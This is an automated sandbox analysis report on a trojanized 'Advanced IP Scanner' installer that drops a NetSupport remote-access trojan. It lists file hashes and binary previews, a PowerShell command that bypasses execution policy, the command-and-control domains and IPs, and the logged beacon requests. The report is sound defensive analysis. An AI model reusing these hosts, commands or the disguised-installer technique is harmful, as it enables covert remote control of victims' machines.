Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\user\AppData\Roaming\SysHelper\nsm_vpro.ini

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.532048032699691
Encrypted:	false
SSDEEP:	3:lsylULyJGI6csM:+ocyJGIPsM
MD5:	3BE27483FDCDBF9EBAE93234785235E3
SHA1:	360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:	4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:	EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:	false
Preview:	[COMMON]..Storage_Enabled=0..Debug_Level=0....

C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72584
Entropy (8bit):	6.671736046146569
Encrypted:	false
SSDEEP:	1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
MD5:	2A2FC166269EFE48D61CB1AB92215DC2
SHA1:	A5679174D941919BAF764F94640994C01D695625
SHA-256:	73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
SHA-512:	13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L......^.....................J.......!............@.......................... ............@....................................<.......T................K..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\init_temp.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	2275903
Entropy (8bit):	7.997003172118591
Encrypted:	true
SSDEEP:	49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
MD5:	C56A7DCC8C1658FA154501AC0819BA7E
SHA1:	DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
SHA-256:	D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
SHA-512:	AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
Malicious:	false
Preview:	PK.........0.6........H..... .nskbfltr.infUT...t..F...gt..Fux.............U....@......A<n..<IO+.(Eh...E.NF...dF.o..Z...B......p...3RlRBU....W..$....4l.. .!...QY. ^..m.%......SL......9.w.R.tv....%.}..j..)...........0..F......V1.B6..y.WU...$..M....B1;~...&.)~...I....?.g.._..R..PK.........H...PK...........W.............. .NSM.LICUT...l}.dl}.dl}.dux.............-..NB1...........]..(7..C...%,.n.....3....6_Sm.......w^..'...=......e.x.f+$dW. .I.=.{y#.\|.....C.....tL.q.....hL>Q...D.j..8..W+ ..5\.....v.\|^...../7...X.V...b...9...X@A.....f.:....Fx.@..7.......U.~.PK....k%........PK........S..<.............. .nsm_vpro.iniUT...n:.K...gn:.Kux..............v.........../JLO.w.KL.IM.5..rIMM..I-K..qy..PK..I...-.......PK........bo.H........x..... .pcicapi.dllUT...x. W...gx. Wux...............\SG.8\|.a@ (.D..E1...$,B.[.@.\A.`@..D..1F.K..P...m.u_*.hk....Z..j...TQ.\|..MX.>.............3s.....7....bQ..d.Q.......5@r.....}........2.........~ZJnn........\~...?'/].....k.q....{.Us.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.992825732698486
TrID:	Win32 Executable (generic) a (10002005/4) 98.45% Inno Setup installer (109748/4) 1.08% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Advanced_IP_Scanner_2.5.4594.12.exe
File size:	21'426'168 bytes
MD5:	446c29d515104b6752c1e9da981d4e5e
SHA1:	d52760df6b22805a4470a6b2e72654ce36577f30
SHA256:	7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
SHA512:	c1ad4560b055f630fae3487f0914e8b486d985edc4cf987649e190e1f36fc2ca47044ba94822add92245886a8048890fdda8263651d58a34d6ca0e85a3a73804
SSDEEP:	393216:fTjU2t/X9E3JMUNccjPql0NbgVunl22V5v+w4lWKjEGZuv5:bjU2p9EZvNdjP6Kbaunldv+w4As7Zux
TLSH:	71273363B687A43EF09E0B3B1672B25444FBAA116823AE1785F494BCCF250501E7F75B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	af4f59b4f071970c

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	26/09/2024 07:47:26 27/09/2025 07:47:26
Subject Chain	E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	92142F58BB541C3BD5CD828C76AE0FC4
Thumbprint SHA-1:	56FC98490B4845072947536B9E0AC121A37744E6
Thumbprint SHA-256:	CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
Serial:	7F07AA1BB8A3B0183893B1AA

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007F33391BCEA5h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F333924E82Bh
call 00007F333924E37Eh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F3339249058h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007F33391B6F53h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007F333924A383h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F333924E8B3h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F333925559Ah
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007F333924AC78h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x992c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x146c6b8	0x2940
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x992c	0x9a00	89075e5f11da974cacd24bc703f451d6	False	0.34600750811688313	data	5.199005877288098	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb5b8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5472972972972973
RT_ICON	0xcb6e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.34104046242774566
RT_ICON	0xcbc48	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.396505376344086
RT_ICON	0xcbf30	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.5401624548736462
RT_ICON	0xcc7d8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	English	United States	0.2475609756097561
RT_ICON	0xcce40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.42510660980810233
RT_ICON	0xcdce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5310283687943262
RT_ICON	0xce150	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5316604127579737
RT_ICON	0xcf1f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3271784232365145
RT_STRING	0xd17a0	0x3f8	data			0.3198818897637795
RT_STRING	0xd1b98	0x2dc	data			0.36475409836065575
RT_STRING	0xd1e74	0x430	data			0.40578358208955223
RT_STRING	0xd22a4	0x44c	data			0.38636363636363635
RT_STRING	0xd26f0	0x2d4	data			0.39226519337016574
RT_STRING	0xd29c4	0xb8	data			0.6467391304347826
RT_STRING	0xd2a7c	0x9c	data			0.6410256410256411
RT_STRING	0xd2b18	0x374	data			0.4230769230769231
RT_STRING	0xd2e8c	0x398	data			0.3358695652173913
RT_STRING	0xd3224	0x368	data			0.3795871559633027
RT_STRING	0xd358c	0x2a4	data			0.4275147928994083
RT_RCDATA	0xd3830	0x10	data			1.5
RT_RCDATA	0xd3840	0x310	data			0.6173469387755102
RT_RCDATA	0xd3b50	0x2c	data			1.2045454545454546
RT_GROUP_ICON	0xd3b7c	0x84	data	English	United States	0.6666666666666666
RT_VERSION	0xd3c00	0x584	data	English	United States	0.29036827195467424
RT_MANIFEST	0xd4184	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T19:00:43.628569+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.4	49739	151.236.16.15	443	TCP
2024-10-31T19:00:43.628569+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.4	49740	199.188.200.195	443	TCP
2024-10-31T19:00:58.789554+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49733	TCP
2024-10-31T19:01:37.187096+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49758	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 19:01:13.448246956 CET	49739	443	192.168.2.4	151.236.16.15
Oct 31, 2024 19:01:13.448297024 CET	443	49739	151.236.16.15	192.168.2.4
Oct 31, 2024 19:01:13.448368073 CET	49739	443	192.168.2.4	151.236.16.15
Oct 31, 2024 19:01:13.587723970 CET	49739	443	192.168.2.4	151.236.16.15
Oct 31, 2024 19:01:13.587745905 CET	443	49739	151.236.16.15	192.168.2.4
Oct 31, 2024 19:01:13.587790012 CET	443	49739	151.236.16.15	192.168.2.4
Oct 31, 2024 19:01:13.612992048 CET	49740	443	192.168.2.4	199.188.200.195
Oct 31, 2024 19:01:13.613037109 CET	443	49740	199.188.200.195	192.168.2.4
Oct 31, 2024 19:01:13.613097906 CET	49740	443	192.168.2.4	199.188.200.195
Oct 31, 2024 19:01:13.662723064 CET	49741	80	192.168.2.4	104.26.1.231
Oct 31, 2024 19:01:13.667761087 CET	80	49741	104.26.1.231	192.168.2.4
Oct 31, 2024 19:01:13.667865992 CET	49741	80	192.168.2.4	104.26.1.231
Oct 31, 2024 19:01:13.668118000 CET	49741	80	192.168.2.4	104.26.1.231
Oct 31, 2024 19:01:13.674303055 CET	80	49741	104.26.1.231	192.168.2.4
Oct 31, 2024 19:01:13.687496901 CET	49740	443	192.168.2.4	199.188.200.195
Oct 31, 2024 19:01:13.687517881 CET	443	49740	199.188.200.195	192.168.2.4
Oct 31, 2024 19:01:13.687556028 CET	443	49740	199.188.200.195	192.168.2.4
Oct 31, 2024 19:01:14.636095047 CET	80	49741	104.26.1.231	192.168.2.4
Oct 31, 2024 19:01:14.636178970 CET	49741	80	192.168.2.4	104.26.1.231
Oct 31, 2024 19:03:03.614347935 CET	49741	80	192.168.2.4	104.26.1.231
Oct 31, 2024 19:03:03.619589090 CET	80	49741	104.26.1.231	192.168.2.4
Oct 31, 2024 19:03:03.622450113 CET	49741	80	192.168.2.4	104.26.1.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 19:01:13.418778896 CET	61869	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:01:13.444267988 CET	53	61869	1.1.1.1	192.168.2.4
Oct 31, 2024 19:01:13.588618994 CET	54012	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:01:13.612397909 CET	53	54012	1.1.1.1	192.168.2.4
Oct 31, 2024 19:01:13.642297029 CET	61053	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:01:13.659729004 CET	53	61053	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 31, 2024 19:01:13.418778896 CET	192.168.2.4	1.1.1.1	0x6974	Standard query (0)	payiki.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.588618994 CET	192.168.2.4	1.1.1.1	0x3414	Standard query (0)	anyhowdo.com	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.642297029 CET	192.168.2.4	1.1.1.1	0xb588	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 31, 2024 19:01:13.444267988 CET	1.1.1.1	192.168.2.4	0x6974	No error (0)	payiki.com	151.236.16.15	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.612397909 CET	1.1.1.1	192.168.2.4	0x3414	No error (0)	anyhowdo.com	199.188.200.195	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.659729004 CET	1.1.1.1	192.168.2.4	0xb588	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.659729004 CET	1.1.1.1	192.168.2.4	0xb588	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:01:13.659729004 CET	1.1.1.1	192.168.2.4	0xb588	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	151.236.16.15	443	5304	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:01:13.587723970 CET	218	OUT	POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	104.26.1.231	80	5304	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:01:13.668118000 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Oct 31, 2024 19:01:14.636095047 CET	957	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:01:14 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8db58c97dbad469e-DFW CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDCCBQAACB=BEFBGJHBHNACIEFMIPMPIOHI; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fHDqwhDCAxkK4Q1noDhKQFI2oq1kYJTNlOMcSMBkaFeB5ECDlfhnhj2kAlb6pZpGizfjHovT5z7nMjda0ntZBKz%2BOImo9zhX0ten5dXYNAlplZmx1QJEnYg0dDPwnXyvDVmLwYYXT2WX4mfL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a Data Ascii: f32.7767,-96.7970

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	199.188.200.195	443	5304	C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:01:13.687496901 CET	222	OUT	POST http://199.188.200.195/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 199.188.200.195Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:

Target ID:	0
Start time:	14:00:44
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Imagebase:	0xa50000
File size:	21'426'168 bytes
MD5 hash:	446C29D515104B6752C1E9DA981D4E5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:00:45
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe"
Imagebase:	0x500000
File size:	3'305'472 bytes
MD5 hash:	597637EDBEBB79D482E762E238209BCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:01:07
Start date:	31/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1"
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:01:07
